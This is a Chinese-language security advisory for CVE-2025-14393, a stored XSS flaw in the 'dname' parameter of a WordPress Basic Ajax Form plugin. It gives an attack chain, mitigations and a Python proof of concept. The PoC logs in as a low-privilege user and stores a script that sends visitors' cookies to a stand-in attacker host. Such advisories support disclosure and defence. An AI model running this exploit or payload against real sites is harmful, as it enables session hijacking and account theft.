CVE-2025-14393: Wpik WordPress Basic Ajax Form插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14393

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wpik WordPress Basic Ajax Form plugin for WordPress

漏洞概述

CVE-2025-14393是WordPress插件Wpik WordPress Basic Ajax Form中的一个高危安全漏洞。该插件在1.0及以下所有版本中存在存储型跨站脚本(XSS)漏洞，攻击者可以通过'dname'参数注入恶意JavaScript代码。由于该参数在输入时缺乏充分的消毒处理，恶意脚本会被永久存储在数据库中。当其他用户访问包含恶意代码的页面时，注入的脚本会自动执行，可能导致会话劫持、敏感信息窃取、管理员权限滥用等严重后果。漏洞需要认证才能利用，但只需Contributor级别的最低权限即可发起攻击，这大大降低了利用门槛。该漏洞影响所有使用该插件的WordPress网站，管理员应立即采取修复措施。

技术细节

该漏洞的根本原因在于插件对'dname'参数的处理存在严重的安全缺陷。具体问题包括：1) 输入验证不足：插件在接受'dname'参数时未进行严格的输入验证，允许攻击者输入包含恶意脚本的内容；2) 输出转义缺失：在将数据输出到页面时，插件没有对特殊字符进行正确的HTML转义处理；3) 存储型攻击特性：由于恶意代码被存储在数据库中，任何访问相关页面的用户都会受到攻击，无需受害者点击特定链接。根据WordPress插件代码分析，问题代码位于index.php的第84行和第107行附近，这两个位置分别负责数据接收和输出显示。由于插件设计缺陷，攻击者可以利用WordPress的AJAX功能轻松提交恶意负载，且WordPress的默认权限设置允许Contributor级别的用户创建和编辑内容，进一步扩大了攻击面。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress账户（至少Contributor级别权限）

STEP 2

步骤2

攻击者构造恶意XSS payload并通过AJAX表单提交，payload包含在'dname'参数中

STEP 3

步骤3

插件接收'dname'参数后，未进行充分消毒处理即存储到数据库

STEP 4

步骤4

当其他用户访问包含恶意内容的页面时，浏览器执行注入的JavaScript代码

STEP 5

步骤5

恶意脚本执行后可窃取用户会话cookie、劫持账户或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14393 PoC - Stored XSS in Wpik WordPress Basic Ajax Form # Affected: Wpik WordPress Basic Ajax Form <= 1.0 # Attack Vector: Authenticated Contributor+ can inject XSS via 'dname' parameter import requests import sys from urllib.parse import quote target_url = "http://target-wordpress-site.com" username = "attacker" password = "attacker_password" # XSS payload - steals cookies xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' def exploit_stored_xss(): """Exploit CVE-2025-14393 by injecting XSS via AJAX form""" session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Submit AJAX form with XSS payload in 'dname' parameter ajax_url = f"{target_url}/wp-admin/admin-ajax.php" form_data = { 'action': 'wpik_ajax_form_submit', # Plugin AJAX action 'dname': xss_payload, # XSS injection point 'demail': '[email protected]', 'dmessage': 'Test message' } response = session.post(ajax_url, data=form_data) if response.status_code == 200: print("[+] XSS payload submitted successfully") print(f"[+] Payload stored in database: {quote(xss_payload)}") print("[!] XSS will execute when any user views the affected page") return True else: print("[-] Failed to submit payload") return False if __name__ == "__main__": exploit_stored_xss()

影响范围

Wpik WordPress Basic Ajax Form plugin <= 1.0

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：1) 临时禁用该插件直到有安全更新；2) 使用WordPress安全插件（如Wordfence）添加额外的输入过滤层；3) 限制非管理员用户的AJAX功能使用权限；4) 监控网站日志中的异常AJAX请求；5) 启用Web应用防火墙(WAF)规则检测XSS攻击特征。建议管理员尽快检查网站是否使用了该插件，并关注插件官方更新动态。